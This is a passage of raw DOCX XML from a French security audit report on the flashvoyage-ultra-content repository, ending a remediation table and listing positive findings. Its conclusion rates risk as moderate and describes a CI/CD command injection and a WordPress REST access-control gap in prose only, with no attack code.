          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">FAIBLE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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2332"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Implémenter safeParseLLMJson() dans tous les modules appelant des LLMs (FV-008).</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt; 1 mois</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2332"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FBF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="27AE60"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">INFO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="54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2332"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Mettre en place une Content Security Policy WordPress (FV-009).</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt; 1 mois</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Points positifs constatés</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Les éléments suivants témoignent d'un niveau de maturité sécurité satisfaisant pour un projet de cette nature :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Gestion des secrets par variables d'environnement : aucun secret critique (clé API, mot de passe WordPress) n'est hardcodé. Le pattern process.env est appliqué de manière cohérente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Workflows GitHub Actions utilisant ${{ secrets.X }} : les secrets sensibles sont correctement stockés dans GitHub Secrets, pas en clair dans les workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">.gitignore complet : les fichiers .env et leurs variantes sont correctement exclus du repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Plugin WordPress : sanitize_text_field(), esc_attr(), esc_url(), esc_html() utilisés correctement pour les sorties HTML. L'attribut auth_callback est présent pour les posts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Gestion du rate limiting : le module rate-limit-manager.js montre une prise en compte des limites API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">package-lock.json présent : les versions des dépendances sont fixées, et npm audit ne remonte aucun CVE connu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fichiers obsolètes préfixés _OBSOLETE_ : bonne pratique de marquage du code mort avant suppression.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le repository flashvoyage-ultra-content présente un profil de risque modéré (4.5/10). Il n'existe pas de vulnérabilité critique (exposition de secrets, RCE directe) mais deux vulnérabilités de sévérité haute doivent être corrigées rapidement : l'injection de commande dans le pipeline CI/CD et l'absence de contrôle d'accès sur la métadonnée REST WordPress pour les pages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le risque le plus immédiat est l'injection CI/CD (FV-002) : un collaborateur ayant accès au déclenchement manuel des workflows GitHub pourrait injecter des commandes arbitraires sur l'environnement d'exécution GitHub Actions, avec un accès potentiel aux secrets du repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">La bonne nouvelle est que l'architecture générale est saine : les secrets sont gérés via variables d'environnement, les dépendances sont sans CVE connu, et le plugin WordPress fait un usage correct des fonctions d'échappement WordPress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F7FA" w:val="clear"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="9CA3AF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapport généré automatiquement le 01/03/2026 — Confidentiel — Usage interne uniquement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2"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="6B7280"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2026 — Audit Sécurité FlashVoyage</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="6B7280"/>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332" w:sz="4" w:space="2"/>
      </w:pBdr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="1A2332"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">RAPPORT D'AUDIT DE SÉCURITÉ — </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="6B7280"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">flashvoyage-ultra-content (refactor-v2)</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="C00000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">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2332"/>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A2332"/>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2026-03-01T14:00:16.986Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-01T14:00:16.987Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>